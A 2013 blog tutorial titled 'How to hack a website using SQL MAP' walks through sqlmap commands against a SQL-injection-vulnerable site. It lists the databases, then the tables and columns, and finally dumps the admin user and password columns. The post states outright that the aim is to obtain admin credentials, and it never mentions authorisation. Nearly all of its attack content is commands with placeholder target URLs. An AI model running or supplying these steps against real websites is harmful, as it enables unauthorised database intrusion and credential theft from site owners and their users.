Advertisement

Wednesday, June 5, 2013

How to hack a website using SQL MAP ? SQL Map Tutorial .


How to Hack a website Using SQL MAP ?

Hello Hackers, This is Vinit with an Interesting Tutorial on SQLMAP. SQLMAP is an automated sql injection takover tool which is used to exploit websites with SQL injection Vulnerability. SQLMAP is already there in backtrack 5 and Kali Linux as Default. What SQLMAP does  is , it exploits the Ijection vulnerability in a website and show the attacker the Details and Critical Information about the website. hackers Look for the Admin username and Password from SQL Injection.

So lets start

What we need: 
1. Backtrack or Kali Linux with SQLMAP preinstalled
2. An Sql injection Vulnerable website 


First locate SQLMAP on hardisk



 Then Type Python sqlmap.py -u "target website url here" --dbs

Note: "-u" is For Target URL and "--dbs" is For Databse


Hit ENTER



 Here We Got two Databases with is show in the above figure

Now type python sqlmap.py -u "target website url here" -D "database to extract" --tables

Note: here -D is for selected database and --tables is for tables to extract





 Here we got tables from Databse we searched for

Now type Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" --columns
Note here -T is for selected table which is admin and --columns is for columns to extract.


Now type Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C "selected Column" --dump
Note here -C is for selected Column and --dump is for dumping all data in that column

Result of Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C user --dump


Result of Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C password --dump


thanks :)

1 comments:

Unknown said...

Are you Serbian? :D

Post a Comment

 
Design by Vinit Varghese | Bloggerized by Hemanth Joseph - Premium Blogger Themes | Online Project management